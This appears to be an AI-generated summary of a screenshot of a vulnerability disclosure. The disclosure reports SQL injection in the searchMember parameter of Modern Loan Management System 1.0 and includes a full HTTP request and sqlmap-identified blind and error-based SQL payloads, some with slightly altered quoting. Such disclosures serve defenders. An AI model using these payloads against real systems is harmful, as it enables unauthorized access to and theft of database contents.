From this webpage screenshot, the following key information about the vulnerability can be obtained: 1. **Vulnerability Title**: SQL injection in Modern Loan management system 1.0 2. **Date**: September 21, 2024 3. **Vendor Homepage**: https://www.sourcecodester.com/users/mayurik 4. **Software Link**: https://www.sourcecodester.com/php/14570/modern-loan-management-system-project-phpmysql-full-source-code.html 5. **Version**: 1.0 6. **Description**: The `searchMember` function developed in Modern Loan Management System, located in the `search_member.php` file, contains an SQL injection vulnerability. 7. **Test Environment**: Windows 10 + Apache + MySQL + PHP 5.4.45 8. **POC** (Proof of Concept): - **POST Request Example**: ``` POST /CVE/admin/index.php?page=search_member HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=lp2f9spshgfvq15min3jn6fr23 Content-Length: 79 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Host: 127.0.0.1 Connection: Keep-alive searchMember=1*&sub=Search%20Member ``` - **SQLmap Identified Injection Points**: ``` sqlmap identified the following injection point(s) with a total of 259 HTTP(s) requests: ``` ``` Parameter: #1* (custom) POST Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: searchMember=1' AND 6653=6653 AND 'MRIN'=MRIN&sub=Search Member ``` ``` Type: error-based Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: searchMember=1' AND ROW(7902,9590)>(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT (ELT(7902=7902,1))),0x7166766271,FLOOR(RAND(0)*2))x FROM (SELECT 9320 UNION SELECT 3819 UNION SELECT 9777 UNION SELECT 6003)a GROUP BY x) AND 'AOku'=AOku&sub=Search Member ``` ``` Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchMember=1' AND (SELECT 3824 FROM (SELECT(SLEEP(5)))mqcw) AND 'QBJY'=QBJY&sub=Search Member ``` This information provides a detailed description of the vulnerability's nature, scope of impact, and how it can be exploited.